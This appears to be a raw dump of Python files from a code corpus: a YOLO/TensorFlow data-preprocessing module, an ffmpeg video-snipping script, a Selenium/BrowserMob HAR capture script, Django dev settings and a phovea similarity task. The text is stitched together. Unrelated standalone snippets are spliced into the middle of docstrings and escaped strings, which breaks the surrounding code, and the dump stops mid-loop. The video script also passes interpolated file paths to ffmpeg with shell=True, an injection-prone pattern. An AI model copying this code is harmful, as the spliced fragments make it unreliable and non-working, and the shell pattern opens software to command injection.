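def knn_label(query, bank_x, bank_y, k=3):
    # query: 1-D tensor; bank_x: (N, d) tensor; bank_y: list of N labels
    dist = torch.tensor(cdist(query[None].numpy(), bank_x.numpy(), metric="cosine")).squeeze(0)
    idx = dist.topk(k, largest=False).indices
    return Counter(bank_y[int(i)] for i in idx).most_common(1)[0][0]
# -----------------------------------------------------------------------------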
jitter_x, jitter_y, jitter_cx, jitter_cy, jitter_bw, jitter_bh, randscale\n\n\n@tf.function\ndef build_grided_gt(y_true, mask, size):\n \"\"\"\n convert ground truth for use in loss functions\n Args: \n y_true: tf.Tensor[] ground truth [box coords[0:4], classes_onehot[0:-1], best_fit_anchor_box]\n mask: list of the anchor boxes choresponding to the output, ex. [1, 2, 3] tells this layer to predict only the first 3 anchors in the total. \n size: the dimensions of this output, for regular, it progresses from 13, to 26, to 52\n \n Return:\n tf.Tensor[] of shape [batch, size, size, #of_anchors, 4, 1, num_classes]\n \"\"\"\n batches = tf.shape(y_true)[0]\n num_boxes = tf.shape(y_true)[1]\n len_masks = tf.shape(mask)[0]\n\n # finshape = tf.convert_to_tensor([batches, size, size, len_masks * tf.shape(y_true)[-1]])\n full = tf.zeros([batches, size, size, len_masks, tf.shape(y_true)[-1]])\n depth_track = tf.zeros((batches, size, size, len_masks), dtype=tf.int32)\n\n x = tf.cast(y_true[..., 0] * tf.cast(size, dtype=tf.float32),\n dtype=tf.int32)\n y = tf.cast(y_true[..., 1] * tf.cast(size, dtype=tf.float32),\n dtype=tf.int32)\n\n anchors = tf.repeat(tf.expand_dims(y_true[..., -1], axis=-1),\n len_masks,\n axis=-1)\n\n update_index = tf.TensorArray(tf.int32, size=0, dynamic_size=True)\n update = tf.TensorArray(tf.float32, size=0, dynamic_size=True)\n\n i = 0\n for batch in range(batches):\n for box_id in range(num_boxes):\n if K.all(tf.math.equal(y_true[batch, box_id, 2:4], 0)):\n continue\n if K.any(tf.math.less(y_true[batch, box_id, 0:2], 0.0)) or K.any(\n tf.math.greater_equal(y_true[batch, box_id, 0:2], 1.0)):\n #tf.print(\"outer vals: \",y_true[batch, box_id, 0:2])\n continue\n index = tf.math.equal(anchors[batch, box_id], mask)\n if K.any(index):\n p = tf.cast(K.argmax(tf.cast(index, dtype=tf.int32)),\n dtype=tf.int32)\n\n # start code for tie breaker, temp check performance\n # find the index of the box\n uid = 1\n used = depth_track[batch, y[batch, box_id], x[batch, box_id],\n p]\n count = 0\n # check if the next anchor is used used == 1, if so find another box\n while tf.math.equal(used, 1) and tf.math.less(count, 3):\n uid = 2\n count += 1\n p = (p + 1) % 3\n used = depth_track[batch, x[batch, box_id], y[batch,\n box_id], p]\n if tf.math.equal(used, 1):\n tf.print(\"skipping\")\n continue\n # set the current index to used = 2, to indicate that it is occupied by something that should not be there, so if another box fits that anchor\n # it will be prioritized over the current box.\n depth_track = tf.tensor_scatter_nd_update(\n depth_track,\n [(batch, y[batch, box_id], x[batch, box_id], p)], [uid])\n #end code for tie breaker\n\n # write the box to the update list\n # the boxes output from yolo are for some reason have the x and y indexes swapped for some reason, I am not sure why\n \"\"\"peculiar\"\"\"\n update_index = update_index.write(\n i, [batch, y[batch, box_id], x[batch, box_id], p])\n value = K.concatenate([\n y_true[batch, box_id, 0:4],\n tf.convert_to_tensor([1.]), y_true[batch, box_id, 4:-1]\n ])\n update = update.write(i, value)\n i += 1\n \"\"\"\n used can be:\n 0 not used\n 1 used with the correct anchor\n 2 used with offset anchor\n if used is 0 or 2:\n do not enter tie breaker (count = 0)\n edit box index with the most recent box\n if tie breaker was used:\n set used to 2\n else:\n set used to 1\n E tensorflow/core/grappler/optimizers/dependency_optimizer.cc:741] Iteration = 0, topological sort failed with message: The graph couldn't be sorted in topological order.\n raised 
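# A toy, self-contained example of the tf.tensor_scatter_nd_add pattern that
# build_grided_gt() uses to place each ground-truth box into its
# (batch, y, x, anchor) cell; the shapes are illustrative, not the real
# YOLO configuration.
import tensorflow as tf

grid = tf.zeros([1, 4, 4, 3, 6])       # [batch, y, x, anchor, box+conf+class]
indices = tf.constant([[0, 2, 1, 0]])  # batch 0, cell y=2, x=1, anchor 0
updates = tf.constant([[0.4, 0.6, 0.2, 0.3, 1.0, 1.0]])
grid = tf.tensor_scatter_nd_add(grid, indices, updates)
print(grid[0, 2, 1, 0])                # the written box vector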
likely due to a memory issue? reduced batch size to 2 and it solved the problem? odd\n W tensorflow/core/grappler/optimizers/loop_optimizer.cc:906] Skipping loop optimization for Merge node with control input: cond/branch_executed/_11\n idk should look into this\n 18 seconds for 2000 images\n \"\"\"\n\n # if the seize of the update list is not 0, do an update, other wise, no boxes and pass an empty grid\n if tf.math.greater(update_index.size(), 0):\n update_index = update_index.stack()\n update = update.stack()\n full = tf.tensor_scatter_nd_add(full, update_index, update)\n return full\n\n\ndef _classification_data_augmentation(datapoint, num_of_classes):\n \"\"\"Augments image by performing Random Zoom, Resize with Pad, Random Rotate,\n Random Brightness Distortion, Random Saturation Distortion, Random Hue Distortion\n and finally normalizing the image.\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n Returns:\n Either Image and Label or Image and Object.\n \"\"\"\n # Data Augmentation values intializations.\n image = datapoint['image']\n image = tf.cast(image, tf.float32)\n w = tf.cast(tf.shape(image)[0], tf.float32)\n h = tf.cast(tf.shape(image)[1], tf.int32)\n low = tf.cast(128, tf.dtypes.float32)[None]\n high = tf.cast(448, tf.dtypes.float32)[None]\n scale = tf.py_function(_rand_number, [low, high], [tf.float32])\n aspect = tf.py_function(_rand_number, [.75, 1.25], [tf.float32])\n deg = tf.py_function(_rand_number, [-7.0, 7.0], [tf.float32])\n scale = tf.cast(scale, dtype=tf.int32)[0][0]\n deg = tf.cast(deg, dtype=tf.float32)[0]\n aspect = tf.cast(aspect, dtype=tf.float32)[0]\n nh = tf.cast(w / aspect, dtype=tf.int32)\n nw = tf.cast(w, dtype=tf.int32)\n # Data Augmentation Functions.\n image = tf.image.resize(image, size=(nw, nh))\n image = tf.image.resize_with_crop_or_pad(image,\n target_height=scale,\n target_width=scale) # Zoom\n image = tf.image.resize_with_pad(image,\n target_width=224,\n target_height=224) # Final Output Shape\n image = _rotate(image, deg) # Rotate\n image = tf.image.random_brightness(image=image,\n max_delta=.75) # Brightness\n image = tf.image.random_saturation(image=image, lower=0.75,\n upper=1.25) # Saturation\n image = tf.image.random_hue(image=image, max_delta=.1) # Hue\n image = tf.clip_by_value(image / 255, 0, 1) # Normalize\n if \"objects\" in datapoint:\n return image, datapoint['objects']\n else:\n return image, tf.one_hot(datapoint['label'], num_of_classes)\n\n\ndef _priming_data_augmentation(datapoint, num_of_classes):\n \"\"\"Augments image by performing Random Zoom, Resize with Pad, and\n finally normalizing the image.\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n Returns:\n Either Image and Label or Image and Object.\n \"\"\"\n # Data Augmentation values intializations.\n image = datapoint['image']\n image = tf.cast(image, tf.float32)\n w = tf.cast(tf.shape(image)[0], tf.float32)\n h = tf.cast(tf.shape(image)[1], tf.int32)\n low = tf.cast(448, tf.dtypes.float32)[None]\n high = tf.cast(512, tf.dtypes.float32)[None]\n scale = tf.py_function(_rand_number, [low, high], [tf.float32])\n scale = tf.cast(scale, dtype=tf.int32)[0][0]\n # Data Augmentation Functions.\n image = tf.image.resize_with_crop_or_pad(image,\n target_height=scale,\n target_width=scale) # Zoom\n image = tf.image.resize_with_pad(image,\n target_width=448,\n target_height=448) # Final Output Shape\n image = image / 255 #Normalize\n if \"objects\" in datapoint:\n return 
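# The photometric part of _classification_data_augmentation() above, condensed
# into a runnable snippet on a random toy image; the delta/range values mirror
# the ones used in the function.
import tensorflow as tf

image = tf.random.uniform([224, 224, 3], maxval=255.0)
image = tf.image.random_brightness(image, max_delta=0.75)
image = tf.image.random_saturation(image, lower=0.75, upper=1.25)
image = tf.image.random_hue(image, max_delta=0.1)
image = tf.clip_by_value(image / 255.0, 0.0, 1.0)  # normalize to [0, 1]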
image, datapoint['objects']\n else:\n return image, tf.one_hot(datapoint['label'], num_of_classes)\n\n\ndef _detection_data_augmentation(image,\n label,\n masks,\n fixed_size=True,\n jitter_im=False):\n \"\"\"\n for each mask in masks, compute a output ground truth grid\n \n Args: \n image: tf.tensor image to manipulate \n label: the ground truth of the boxes [batch, 4, 1, num_classes]\n masks: dictionary for the index of the anchor to use at each scale, the number of keys should be the \n same as the number of prediction your yolo configuration will make. \n \n ex: yolo regular: -> change to this format\n {256: [0,1,2], 512: [3,4,5], 1024: [6,7,8]}\n \n return: \n tf.Tensor: for the image with jitter computed \n dict{tf.tensor}: output grids for proper yolo predictions\n \n \"\"\"\n # Image Jitter\n jitter_x, jitter_y, jitter_cx, jitter_cy, jitter_bw, jitter_bh, randscale = tf.py_function(\n py_func_rand, [], [\n tf.float32,\n tf.float32,\n tf.float32,\n tf.float32,\n tf.float32,\n tf.float32,\n tf.int32,\n ])\n if fixed_size:\n randscale = 13\n\n if jitter_im == True:\n image_jitter = tf.concat([jitter_x, jitter_y], axis=0)\n image_jitter.set_shape([2])\n image = tfa.image.translate(\n image, image_jitter * tf.cast(tf.shape(image)[1], tf.float32))\n # Bounding Box Jitter\n #tf.print(tf.shape(label))\n x = tf.math.add(label[..., 0], jitter_x + jitter_cx)\n x = tf.expand_dims(x, axis=-1)\n y = tf.math.add(label[..., 1], jitter_y + jitter_cy)\n y = tf.expand_dims(y, axis=-1)\n w = label[..., 2] * jitter_bw\n w = tf.expand_dims(w, axis=-1)\n h = label[..., 3] * jitter_bh\n h = tf.expand_dims(h, axis=-1)\n\n rest = label[..., 4:]\n label = tf.concat([x, y, w, h, rest], axis=-1)\n # Other Data Augmentation\n image = tf.image.resize(image, size=(randscale * 32,\n randscale * 32)) # Random Resize\n image = tf.image.random_brightness(image=image, max_delta=.1) # Brightness\n image = tf.image.random_saturation(image=image, lower=0.75,\n upper=1.25) # Saturation\n image = tf.image.random_hue(image=image, max_delta=.1) # Hue\n\n for key in masks.keys():\n masks[key] = build_grided_gt(\n label, tf.convert_to_tensor(masks[key], dtype=tf.float32),\n randscale)\n randscale *= 2\n\n return image, masks\n\n\n# def _detection_data_augmentation(image, label, masks, fixed_size = True, jitter_im = False):\n# \"\"\"\n# for each mask in masks, compute a output ground truth grid\n\n# Args:\n# image: tf.tensor image to manipulate\n# label: the ground truth of the boxes [batch, 4, 1, num_classes]\n# masks: dictionary for the index of the anchor to use at each scale, the number of keys should be the\n# same as the number of prediction your yolo configuration will make.\n\n# ex: yolo regular: -> change to this format\n# {256: [0,1,2], 512: [3,4,5], 1024: [6,7,8]}\n\n# return:\n# tf.Tensor: for the image with jitter computed\n# dict{tf.tensor}: output grids for proper yolo predictions\n\n# \"\"\"\n\n# #masks = tf.convert_to_tensor(masks, dtype= tf.float32)\n# # Image Jitter\n# jitter, randscale = tf.py_function(py_func_rand, [], [tf.float32, tf.int32])\n# if fixed_size:\n# randscale = 13\n\n# if jitter_im == True:\n# image_jitter = tf.concat([jitter, jitter], axis = 0)\n# image_jitter.set_shape([2])\n# image = tfa.image.translate(image, image_jitter)\n# # Bounding Box Jitter\n# #tf.print(tf.shape(label))\n# x = tf.math.add(label[..., 0], jitter)\n# x = tf.expand_dims(x, axis = -1)\n# y = tf.math.add(label[..., 1], jitter)\n# y = tf.expand_dims(y, axis = -1)\n# rest = label[..., 2:]\n# label = tf.concat([x,y,rest], 
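# A numpy sketch of the box bookkeeping in _detection_data_augmentation():
# when the image is translated by (jx, jy) in normalized coordinates, the box
# centers must shift by the same amounts; the boxes here are hypothetical
# [x, y, w, h] rows.
import numpy as np

boxes = np.array([[0.50, 0.50, 0.20, 0.30],
                  [0.25, 0.75, 0.10, 0.10]])
jx, jy = 0.05, -0.03
boxes[:, 0] += jx      # x centers follow the horizontal shift
boxes[:, 1] += jy      # y centers follow the vertical shift
boxes[:, 2:4] *= 1.02  # mild width/height jitter, like jitter_bw/jitter_bh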
axis = -1)\n# # Other Data Augmentation\n# image = tf.image.resize(image, size = (randscale * 32, randscale * 32)) # Random Resize\n# image = tf.image.random_brightness(image=image, max_delta=.1) # Brightness\n# image = tf.image.random_saturation(image=image, lower = 0.75, upper=1.25) # Saturation\n# image = tf.image.random_hue(image=image, max_delta=.1) # Hue\n\n# for key in masks.keys():\n# masks[key] = build_grided_gt(label, tf.convert_to_tensor(masks[key], dtype= tf.float32), randscale)\n# randscale *= 2\n\n# return image, masks\n\n\ndef _normalize(datapoint, h, w, num_of_classes):\n \"\"\"Normalizes the image by resizing it to the desired output shape\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n \n Returns:\n normalize (dict): A Normalized Image alongside the mapped information.\n \"\"\"\n image = datapoint['image']\n image = tf.cast(image, tf.float32)\n image = tf.image.resize_with_pad(image, target_width=h,\n target_height=w) # Final Output Shape\n image = image / 255 # Normalize\n if \"objects\" in datapoint:\n return image, datapoint['objects']\n else:\n return image, tf.one_hot(datapoint['label'], num_of_classes)\n\n\ndef _detection_normalize(data, anchors, width, height):\n \"\"\"Normalizes the image by resizing it to the desired output shape\n Args:\n datapoint (dict): A Dictionaty that holds the image as well as other relevant\n information.\n \n h: the default height to scale images of variable shape to in order to batch the images \n w: the default width to scale images of variable shape to in order to batch the images\n number of classes: the number of classes that can be predicted for each object \n Returns:\n tf.Tensor (image): scaled and resized image for input into model, prior to batching\n tf.Tensor (label): the label of the bounding boxes with the best anchor asscoiated with it known for each ground truth box \n \"\"\"\n image = tf.cast(data[\"image\"], dtype=tf.float32)\n image = tf.image.resize(image, size=(608, 608))\n boxes = data[\"objects\"][\"bbox\"]\n boxes = get_yolo_box(boxes)\n classes = tf.one_hot(data[\"objects\"][\"label\"], depth=80)\n label = tf.concat([boxes, classes], axis=-1)\n label = build_gt(label, anchors, width)\n image = image / 255 # Normalize\n return image, label\n\n\ndef preprocessing(dataset,\n data_augmentation_split,\n preprocessing_type,\n size,\n batch_size,\n num_of_classes,\n shuffle_flag=False,\n anchors=None,\n masks=None,\n fixed=False,\n jitter=False):\n \"\"\"Preprocesses (normalization and data augmentation) and batches the dataset.\n Args:\n dataset (tfds.data.Dataset): The Dataset you would like to preprocess.\n data_augmentation_split (int): The percentage of the dataset that is data\n augmented.\n preprocessing_type (str): The type of preprocessing should be conducted\n and is dependent on the type of training.\n size (int): The size of the dataset being passed into preprocessing.\n batch_size (int): The size of the each batch.\n num_of_classes (int): The number of classes found within the dataset.\n shuffle_flag (bool): This is a Flag that determines whether to or not to shuffle\n within the function.\n Returns:\n dataset (tfds.data.Dataset): A shuffled dataset that includes images that\n have been data augmented\n Raises:\n SyntaxError:\n - Preprocessing type not found.\n - The given batch number for detection preprocessing is more than 1.\n - Number of batches cannot be less than 1.\n - Data augmentation split cannot be greater than 100.\n TypeError:\n - Data 
augmentation split must be an integer.\n - Preprocessing type must be an string.\n - Size must be an integer.\n - Number of batches must be an integer.\n - Shuffle flag must be a boolean.\n WARNING:\n - Dataset is not a tensorflow dataset.\n - Detection Preprocessing may cause NotFoundError in Google Colab.\n \"\"\"\n # TypeError Raising\n if hasattr(dataset, 'element_spec') == False:\n print(\"WARNING: Dataset may not a tensorflow dataset.\")\n if type(data_augmentation_split) is not int:\n raise TypeError(\"Data augmentation split must be an integer.\")\n if type(preprocessing_type) is not str:\n raise TypeError(\"Preprocessing type must be an string.\")\n if type(size) is not int:\n raise TypeError(\"Size must be an integer.\")\n if type(batch_size) is not int:\n raise TypeError(\"Number of batches must be an integer.\")\n if type(shuffle_flag) is not bool:\n raise TypeError(\"Shuffle flag must be a boolean.\")\n # SyntaxError Raising\n if preprocessing_type.lower() != \"detection\" and preprocessing_type.lower(\n ) != \"classification\" and preprocessing_type.lower() != \"priming\":\n raise SyntaxError(\"Preprocessing type not found.\")\n if batch_size < 1:\n raise SyntaxError(\"Batch Size cannot be less than 1.\")\n if data_augmentation_split > 100:\n raise SyntaxError(\n \"Data augmentation split cannot be greater than 100.\")\n if 'google.colab' in sys.modules == True and preprocessing_type.lower(\n ) != \"detection\":\n print(\n \"WARNING: Detection Preprocessing may cause NotFoundError in Google Colab. Please try running on local machine.\"\n )\n\n # Spliting the dataset based off of user defined split.\n data_augmentation_split = int((data_augmentation_split / 100) * size)\n non_preprocessed_split = size - data_augmentation_split\n data_augmentation_dataset = dataset.take(data_augmentation_split)\n remaining = dataset.skip(data_augmentation_split)\n non_preprocessed_split = remaining.take(non_preprocessed_split)\n # Data Preprocessing functions based off of selected preprocessing type.\n\n # Detection Preprocessing\n if preprocessing_type.lower() == \"detection\":\n dataset = data_augmentation_dataset.concatenate(non_preprocessed_split)\n if shuffle_flag == True:\n dataset = dataset.shuffle(size)\n dataset = dataset.map(\n lambda x: _detection_normalize(x, anchors, 416, 416),\n num_parallel_calls=tf.data.experimental.AUTOTUNE).padded_batch(\n int(batch_size))\n dataset = dataset.map(\n lambda x, y: _detection_data_augmentation(\n x, y, masks=masks, fixed_size=fixed, jitter_im=jitter),\n num_parallel_calls=tf.data.experimental.AUTOTUNE) #.prefetch(10)\n # Classification Preprocessing\n elif preprocessing_type.lower() == \"classification\":\n # Preprocessing functions applications.\n non_preprocessed_split = non_preprocessed_split.map(\n lambda x: _normalize(x, 224, 224, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n data_augmentation_dataset = data_augmentation_dataset.map(\n lambda x: _classification_data_augmentation(x, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n # Dataset concatenation, shuffling, batching, and prefetching.\n dataset = data_augmentation_dataset.concatenate(non_preprocessed_split)\n if shuffle_flag == True:\n dataset = dataset.shuffle(size)\n dataset = dataset.padded_batch(int(batch_size)).prefetch(\n tf.data.experimental.AUTOTUNE)\n # Priming Preprocessing\n elif preprocessing_type.lower() == \"priming\":\n # Preprocessing functions applications.\n non_preprocessed_split = non_preprocessed_split.map(\n lambda 
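# The essential tf.data pattern that preprocessing() builds above, shown on a
# toy dataset: map with AUTOTUNE parallelism, then shuffle, batch and prefetch.
import tensorflow as tf

ds = tf.data.Dataset.range(100)
ds = ds.map(lambda x: tf.cast(x, tf.float32) / 100.0,
            num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds = ds.shuffle(100).batch(8).prefetch(tf.data.experimental.AUTOTUNE)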
x: _normalize(x, 448, 448, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n data_augmentation_dataset = data_augmentation_dataset.map(\n lambda x: _priming_data_augmentation(x, num_of_classes),\n num_parallel_calls=tf.data.experimental.AUTOTUNE)\n # Dataset concatenation, shuffling, batching, and prefetching.\n dataset = data_augmentation_dataset.concatenate(non_preprocessed_split)\n if shuffle_flag == True:\n dataset = dataset.shuffle(size)\n dataset = dataset.padded_batch(int(batch_size)).prefetch(\n tf.data.experimental.AUTOTUNE)\n\n return dataset\n","sub_path":"yolo/dataloaders/tests/preprocessing_functions.py","file_name":"preprocessing_functions.py","file_ext":"py","file_size_in_byte":22973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14827937","text":"import os\nimport urllib.request\nimport subprocess\nimport glob\nimport math\nimport numpy as np\nimport sys\n\ndef get_chunk(filename, second, targetDir):\n ffmpeg_command = 'ffmpeg -i %(videopath)s \\\n -ss %(timestamp)f -t %(timestamp_to)f \\\n %(outpath)s' % {\n 'videopath': filename,\n 'timestamp': second,\n 'timestamp_to': 1,\n 'outpath' : targetDir}\n print(ffmpeg_command)\n try:\n subprocess.call(ffmpeg_command, shell=True)\n\n return True\n except:\n return False\n\ndef get_frames(filename, second, targetDir):\n # outdir_folder = os.path.join(outdir_keyframes, video_id)\n # mkdir_p(outdir_folder)\n # outpath = os.path.join(outdir_folder, '%d.jpg' % (int(time_id)))\n targetDir = targetDir + \"/%02d.jpg\"\n ffmpeg_command = 'ffmpeg -i %(videopath)s -vf \"select=not(mod(n\\,1))\" -q:v 2 %(outpath)s' % {\n 'videopath': filename,\n 'outpath': targetDir}\n print(ffmpeg_command)\n try:\n subprocess.call(ffmpeg_command, shell=True)\n\n return True\n except:\n return False\n\n\ndef get_length(filename):\n result = subprocess.run([\"ffprobe\", \"-v\", \"error\", \"-show_entries\",\n \"format=duration\", \"-of\",\n \"default=noprint_wrappers=1:nokey=1\", filename],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n return float(result.stdout)\n\nrootDir = '.'\nvideoDir = rootDir + \"/original-data\"\nsaveDir = rootDir + \"/dataset\"\nchunkStagingDir = rootDir + \"/temp\"\n\nstr_padding = 5\n\ndataset_file = sys.argv[1].replace(\"./\", '')\ndataset = open(dataset_file, 'r').readlines()\n\nfor line in dataset:\n video = line.replace('\\n','')\n\n if not os.path.exists(saveDir + \"/\" + video.replace('.mp4', '')):\n os.mkdir(saveDir + \"/\" + video.replace('.mp4', ''))\n\n video_length = math.floor(get_length(videoDir + \"/\" + video))\n print(\"video: \", video, \" is length \", video_length)\n\n # Snip video\n for second in range(0, video_length + 1):\n if not os.path.exists(saveDir + \"/\" + video.replace('.mp4', '') + \"/\" + str(second).zfill(str_padding)):\n os.mkdir(saveDir + \"/\" + video.replace('.mp4', '') + \"/\" + str(second).zfill(str_padding))\n else:\n continue\n outDir = saveDir + \"/\" + video.replace('.mp4', '') + \"/\" + str(second).zfill(str_padding)\n tempDir = chunkStagingDir + \"/\" + str(second).zfill(str_padding) + \"_\" + video\n get_chunk(videoDir + \"/\" + video, second, tempDir)\n get_frames(tempDir, second, outDir)\n\n\n","sub_path":"make_dataset/videoSnip.py","file_name":"videoSnip.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"275983727","text":"#coding: utf-8\n\nimport json, os, base64\nfrom time import sleep\nfrom 
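# A safer variant of the ffmpeg/ffprobe helpers in videoSnip.py above, using
# argument lists instead of shell=True string interpolation; the paths are
# hypothetical.
import subprocess

def clip_length(path):
    out = subprocess.run(
        ["ffprobe", "-v", "error", "-show_entries", "format=duration",
         "-of", "default=noprint_wrappers=1:nokey=1", path],
        stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return float(out.stdout)

def cut_one_second(src, start, dst):
    subprocess.call(["ffmpeg", "-i", src, "-ss", str(start), "-t", "1", dst])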
selenium import webdriver\nfrom browsermobproxy import Server\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\nBASE_PATH = os.path.dirname(os.path.abspath(__file__))\nFIREFOX_PATH = FirefoxBinary(BASE_PATH + '/firefox/firefox')\nDRIVER_PATH = BASE_PATH + '/geckodriver'\nBMP_PATH = BASE_PATH + '/browsermob/bin/browsermob-proxy'\n\nserver = Server(BMP_PATH)\nserver.start()\nproxy = server.create_proxy()\nprofile = webdriver.FirefoxProfile()\nprofile.set_proxy(proxy.selenium_proxy())\nprofile.accept_untrusted_certs = True\n\nfirefox_options = Options()\nfirefox_options.add_argument('-headless')\n\ndriver = webdriver.Firefox(executable_path=DRIVER_PATH, firefox_binary=FIREFOX_PATH, firefox_profile=profile, firefox_options=firefox_options)\ndriver.set_page_load_timeout(15)\ndriver.implicitly_wait(10)\ndriver.get('https://www.baidu.com')\nsleep(1)\ndriver.execute_script('window.open()')\nhandles = driver.window_handles\ndriver.switch_to_window(handles[-1])\n# driver.execute_script('window.resizeTo(1920,1080);')\nproxy.new_har('test')\ndriver.get('https://www.baidu.com')\nsleep(10)\nwith open('result.har', 'w') as result:\n json.dump(proxy.har, result)\nserver.stop()\ndriver.quit()","sub_path":"tools/firefox_browsermob.py","file_name":"firefox_browsermob.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614899600","text":"\nfrom .base import *\n\nDEBUG = True\n\n# Database\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'personaldicts_database',\n 'USER': 'personaldicts_user',\n 'PASSWORD': 'personaldicts_password',\n 'HOST': 'localhost',\n 'PORT': '',\n 'TEST': {\n 'NAME': 'test_database',\n 'CHARSET': 'UTF8',\n }\n }\n}\n\nINTERNAL_IPS = ['127.0.0.1']\n\nINSTALLED_APPS += [\n 'debug_toolbar',\n 'django_extensions',\n]\n\n# Testing with Nose\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nNOSE_ARGS = [\n '--cover-package=apps,mylabour,project_PersonalDicts',\n '--cover-inclusive',\n '--with-coverage',\n]\n","sub_path":"settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155781303","text":"from phovea_processing_queue.task_definition import task, get_logger\nfrom phovea_server.dataset import list_datasets\nfrom .similarity import similarity_by_name\nimport numpy as np\n\n_log = get_logger(__name__)\n\n\ndef list_groups():\n groups = []\n\n for dataset in list_datasets():\n # check data type, e.g. 
HDFTable, HDFStratification, HDFMatrix\n if dataset.type == 'stratification':\n for group in dataset.groups():\n groups.append(dict(\n dataset=dataset.id,\n label=group.name,\n ids=dataset.rowids(group.range)\n ))\n elif dataset.type == 'matrix' and dataset.value == 'categorical': # some matrices has no categories (mRNA, RPPA)\n mat_data = dataset.asnumpy()\n # datatset.cols() are the stuff that can be in added to stratomex\n for col in range(mat_data.shape[1]): # iterate over columns (numbers)\n mat_column = mat_data[:, col] # get column\n # check in which categories the patients are\n for cat in dataset.categories:\n # get indicies as 1-column matrix and convert to 1d array:\n cat_row_indicies = np.argwhere(mat_column == cat['name'])[:, 0]\n groups.append(dict(\n dataset=dataset.id + '-c' + str(col),\n label=cat if isinstance(cat, str) else cat['label'],\n ids=dataset.rowids()[cat_row_indicies]\n ))\n elif dataset.type == 'table': # has no 'value'-attribute like matrix\n for col in dataset.columns:\n if col.type == 'categorical':\n col_data = col.asnumpy() # table doesnt have asnumpy()\n for cat in col.categories:\n # TCGA table had just the strings, calumma table has a dict like matrix above\n cat_name = cat if isinstance(cat, str) else cat['name']\n cat_row_indicies = np.argwhere(col_data == cat_name)[:, 0]\n if cat_row_indicies.size > 0:\n groups.append(dict(\n # id in stratomex has trailing '-s' which is not needed here\n # (e.g. tcgaGbmSampledClinical_patient.ethnicity-s)\n dataset=dataset.id + '_' + col.name,\n label=cat if isinstance(cat, str) else cat['label'],\n ids=dataset.rowids()[cat_row_indicies]\n ))\n\n return groups\n\n\ndef list_columns():\n columns = []\n\n # columns {\n # id (full id)\n # type (categorical, real, int, string, ...) (not dataset's type but the column's\n # rowids\n\n # groups {\n # label\n # ids --> from rowIds\n # }\n # }\n\n # for dataset in list_datasets():\n # check data type, e.g. HDFTable, HDFStratification, HDFMatrix\n # if dataset.type == 'stratification':\n # elif dataset.type == 'matrix':\n # elif dataset.type == 'table': # has no 'value'-attribute like matrix\n\n return columns\n\n\n@task\ndef column_similarity(method, column_id):\n _log.debug('Start to calculate %s similarity.', method)\n\n similarity_measure = similarity_by_name(method)\n if similarity_measure is None:\n raise ValueError(\"No similarity measure for given method: \" + method)\n\n # result\n # -- dataset_id =\n # -- -- similarity score\n # -- dataset_id\n # -- -- similarity score\n # an so on\n result = {}\n\n try:\n given_columns_values = np.array([])\n\n # find given column\n for dataset in list_datasets():\n if dataset.type == 'table': # maybe also vector?\n for col in dataset.columns:\n if col.type == 'real' or col.type == 'int':\n # real and int is numerical\n col_id = dataset.id + '_' + col.name\n # col_id will be eg.: calumma_experiment_set_1_Alter bei Diagnose\n # endswith will match id with dataset id, or just the column label (Alter bei Diagnose)\n if col_id.endswith(column_id):\n given_columns_values = col.asnumpy()\n\n # compare given column\n if given_columns_values.shape > 0:\n for dataset in list_datasets():\n if dataset.type == 'table': # maybe also vector?\n for col in dataset.columns:\n if col.type == 'real' or col.type == 'int':\n other_values = col.asnumpy()\n result[dataset.id + '_' + col.name] = similarity_measure(given_columns_values, other_values)\n\n except Exception as e:\n _log.exception('Can not fulfill task. 
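# A tiny standalone example of the np.argwhere pattern list_groups() uses to
# collect the row ids belonging to one category; the data is made up.
import numpy as np

column = np.array(["a", "b", "a", "c", "a"])
row_ids = np.arange(100, 105)
cat_rows = np.argwhere(column == "a")[:, 0]  # -> array([0, 2, 4])
ids = row_ids[cat_rows]                      # -> array([100, 102, 104])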
Error: %s.', e)\n raise # rejects promise\n\n return result # to JSON automatically\n\n\n@task\ndef group_similarity(method, ids):\n _log.debug('Start to calculate %s similarity.', method)\n\n similarity_measure = similarity_by_name(method)\n if similarity_measure is None:\n raise ValueError(\"No similarity measure for given method: \" + method)\n\n result = {'values': {}, 'groups': {}, 'threshold': {}}\n\n try:\n from phovea_server.range import parse\n parsed_range = parse(ids)\n cmp_patients = np.array(parsed_range[0]) # [0] since ranges are multidimensional but you just want the first one\n # now compare that group's list of patients to all others\n\n # categorized data:\n for group in list_groups():\n sim_score = similarity_measure(cmp_patients, group['ids'])\n if group['dataset'] not in result[\"values\"] or similarity_measure.is_more_similar(sim_score, result['values'][group['dataset']]):\n result['values'][group['dataset']] = sim_score\n result['groups'][group['dataset']] = group['label']\n\n # numerical data:\n # numerical data is binned to find best match\n for dataset in list_datasets():\n if dataset.type == 'table': # maybe also vector?\n print(dataset.id)\n for col in dataset.columns:\n if col.type == 'real' or col.type == 'int':\n # real and int is numerical\n data_stack = np.column_stack(\n (dataset.rowids(), col.asnumpy(), np.zeros((dataset.rowids().shape[0], 4)))) # concat ids an data\n # matrix is sorted by id, not by data\n data_stack = data_stack[data_stack[:, 1].argsort()] # sort by data\n ids_found = 0\n ids_present = np.sum(np.in1d(cmp_patients, dataset.rowids(), assume_unique=True))\n for row in range(data_stack.shape[0]): # iterate over columns (numbers)\n 